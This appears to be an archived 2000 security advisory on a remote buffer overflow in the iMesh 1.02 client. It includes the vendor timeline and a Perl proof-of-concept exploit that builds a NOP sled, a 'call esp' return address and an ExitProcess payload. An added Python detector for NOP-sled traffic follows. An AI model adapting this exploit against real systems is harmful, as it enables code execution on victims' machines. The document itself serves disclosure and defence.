imbof102.txt

29 Jun 2000 | Reported by Blue Panda | Type: packetstorm | Source: packetstormsecurity.com

iMesh 1.02 Builds 116/117 vulnerable to buffer overflow allowing arbitrary code execution.

`================================================================  
BluePanda Vulnerability Announcement: iMesh 1.02 Build 116/117  
29/06/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
================================================================  
  
====================  
Brief description:  
====================  
  
iMesh 1.02 builds 116 and 117 are vulnerable to a buffer overflow that can be  
exploited to execute arbitrary code. Once iMesh connects to a server, it  
begins listening on a TCP port (varies). An attacker can connect to this port  
and cause an overflow which will overwrite EIP, effectively redirecting the  
flow of execution.  
  
================  
Vendor status:  
================  
  
iMesh were notified of this vulnerability on Sunday the 18th of June. Proof  
of concept was provided, and I did not receive a response from them until  
that Thursday. I replied that night, and did not receive a reply until the  
following Tuesday (the 27th of June). I was informed that the problem had  
been fixed, but a patch would not be made available to the public, and the  
changes would be incorporated into the next version of iMesh - the release  
date of which I was not given.  
  
=====================  
Affected versions:  
=====================  
  
Vulnerable: iMesh 1.02 Build 116/117, possibly prior versions (untested).  
Immune: No publicly released version of iMesh as of 29/06/2000 (dd/mm/yyyy).  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# iMesh 1.02 Build 116/117 client buffer overflow  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Note: The payload executed by this script just calls ExitProcess (causing  
# iMesh to exit silently).  
#  
  
use IO::Socket;  
  
$host = "localhost";  
$port = "4011"; # This may require adjustment.  
  
# Call ExitProcess.  
$payload = "\xff\x25\x18\xb2\x4c\x00";  
  
$count = 0;  
$es = "";  
while($count < 0x272d) {  
$es .= "\x90";  
$count += 1;  
}  
$es .= "\x43\x04\x43\x00"; # IMESHCLIENT.EXE, call esp  
$count = 0;  
while($count < 2048) {  
$es .= "\x90";  
$count += 1;  
}  
$es .= $payload; # Tack the payload onto the end.  
  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n";  
print "done.\n";  
print $socket "$es";  
  
print "Waiting 5 seconds...\n";  
sleep(5);  
  
# Done.  
close($socket);  
print "Finished.\n";  
  
`
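From the defender's side, the proof of concept above has a recognisable shape on the wire: 0x272d bytes of 0x90 filler, a 4-byte return address, 2048 more 0x90 bytes, then the payload. The following is an added example, not part of the original advisory, of a stream check that flags such filler runs even when they span TCP segment boundaries; the function names, the 256-byte threshold and the 1460-byte segment size are assumptions, and the sample stream is constructed with placeholder bytes in place of the address and payload.

```python
"""Flag long single-byte filler runs (e.g. 0x90 NOP sleds) in an inbound TCP stream."""
from dataclasses import dataclass
from typing import Iterable, List

NOP = 0x90
MIN_RUN = 256  # assumed alert threshold; tune per protocol


@dataclass
class Run:
    offset: int   # stream offset where the run starts
    length: int   # number of consecutive filler bytes


def find_filler_runs(segments: Iterable[bytes], filler: int = NOP,
                     min_run: int = MIN_RUN) -> List[Run]:
    """Return filler runs >= min_run, tracking runs that span segment boundaries."""
    runs: List[Run] = []
    pos = 0          # absolute offset in the reassembled stream
    start = None     # start offset of the run in progress, if any
    for seg in segments:
        for b in seg:
            if b == filler:
                if start is None:
                    start = pos
            elif start is not None:
                if pos - start >= min_run:
                    runs.append(Run(start, pos - start))
                start = None
            pos += 1
    # A run may still be open when the stream ends.
    if start is not None and pos - start >= min_run:
        runs.append(Run(start, pos - start))
    return runs


def constructed_stream(seg_size: int = 1460) -> List[bytes]:
    """Constructed sample with the PoC's layout; placeholder bytes stand in
    for the return address (AAAA) and the payload (BBBBBB)."""
    data = b"\x90" * 0x272D + b"AAAA" + b"\x90" * 2048 + b"BBBBBB"
    return [data[i:i + seg_size] for i in range(0, len(data), seg_size)]


if __name__ == "__main__":
    for run in find_filler_runs(constructed_stream()):
        print(f"filler run at offset {run.offset}, {run.length} bytes")
```

This is a heuristic only: binary file transfers can legitimately contain 0x90 runs, and filler bytes other than 0x90 pass unnoticed unless `filler` is changed.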
